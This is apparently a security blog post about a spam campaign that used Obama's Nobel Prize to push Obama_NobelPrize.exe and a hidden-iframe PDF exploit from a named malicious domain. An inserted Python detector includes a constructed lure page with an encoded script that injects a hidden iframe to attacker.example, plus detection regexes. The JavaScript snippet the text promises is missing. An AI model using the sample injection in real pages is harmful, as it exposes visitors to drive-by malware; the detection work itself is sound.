Just when I thought we weren’t going to see any spam campaigns related to the recent announcement of United States President Barack Obama being awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.
This spam campaign questions whether Barack Obama deserved to win the Nobel Prize and claims that significant fallout is being felt around the country as a result. The email then asks the recipient to click, or copy and paste into their browser, a link that will take them to a website where they can supposedly download more information.

If the user clicks the link in the email, they are taken to a site that shows an image of Barack Obama, followed by a notice that their download will start shortly. Remember that, based on the email, the user believes they are about to download a report on the unrest supposedly created by Obama's acceptance of the award.

Five seconds after the page loads, the user is prompted to download an executable file named Obama_NobelPrize.exe. That is not the end of the story, however. Not content to rely on a user who might suddenly realize they are about to download an executable they do not want, the attackers embedded an extra bit of fun in this page. At the bottom of the page is a small snippet of encoded JavaScript that looks like this:

Decoding this JavaScript reveals that the page also silently loads an iframe hosted on the tokyopharmm.com domain, which in turn attempts a series of PDF exploits to plant a password-stealing trojan on the user's PC, currently identified by McAfee as "Generic PWS.y!hv.i".
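As an added illustration (not part of the original post, and not code from the campaign page), the following Python check shows what a defender can do with a fetched copy of a lure page like this one: decode any percent-encoded string handed to `unescape()`, then flag zero-size or off-host iframes in both the raw page and the decoded layers, along with a timer that redirects to an .exe. The sample page, the host names `lure.example` and `attacker.example`, and the iframe contents are constructed for the example.

```python
import re
import urllib.parse
from html.parser import HTMLParser

# Constructed sample page (not the real campaign page): a visible "download
# starts shortly" lure plus a percent-encoded script, as the post describes,
# that writes a zero-size iframe pointing at a second host.
HIDDEN_IFRAME = ('<iframe src="http://attacker.example/pdf/" width="0" '
                 'height="0" style="display:none"></iframe>')
SAMPLE_HTML = (
    '<html><body><img src="obama.jpg"><p>Your download will start shortly.</p>'
    '<script>setTimeout(function(){location.href="Obama_NobelPrize.exe"},5000);</script>'
    '<script>document.write(unescape("' + urllib.parse.quote(HIDDEN_IFRAME, safe="")
    + '"));</script></body></html>')

# eval(unescape("...")) or document.write(unescape("...")); group 1 is the encoded string
ENCODED_JS = re.compile(r'(?:eval|document\.write)\s*\(\s*unescape\s*\(\s*["\']([^"\']+)["\']', re.I)
# a timer whose callback sends the browser to an .exe (the "starts shortly" trick)
EXE_TIMER = re.compile(r'setTimeout\s*\([^;]*\.exe', re.I)

class IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []          # attribute dict of every <iframe> seen
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))

def is_hidden(attrs):
    """True for the 0x0 / 1x1 / display:none iframes a user never sees."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)

def scan(html, page_host):
    """Return a list of findings for one fetched page; [] means nothing suspicious."""
    findings = []
    if EXE_TIMER.search(html):
        findings.append("timed redirect to an .exe download")
    layers = [html]                # raw page plus each decoded script string
    for m in ENCODED_JS.finditer(html):
        findings.append("percent-encoded script passed to unescape() at offset %d" % m.start())
        layers.append(urllib.parse.unquote(m.group(1)))
    for layer in layers:
        p = IframeCollector()
        p.feed(layer)
        for a in p.iframes:
            src = a.get("src") or ""
            host = urllib.parse.urlsplit(src).hostname or page_host
            if is_hidden(a) or host != page_host:
                findings.append("hidden or off-host iframe -> %s" % src)
    return findings
```

Running `scan(SAMPLE_HTML, "lure.example")` reports all three tricks, while a page whose only iframe is a visible same-host one produces no findings.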
This is another example of a current news story being used as a lure to get users to download malware. It is a popular tactic that has been repeated over and over, and it continues to be used because it keeps working. Even if you think you will outwit the malware authors by visiting their website but not downloading the executable the page prompts you with, that does not rule out the page running JavaScript in the background that opens other pages or sites in invisible iframes, tests your machine for other zero-day vulnerabilities, and exploits them.
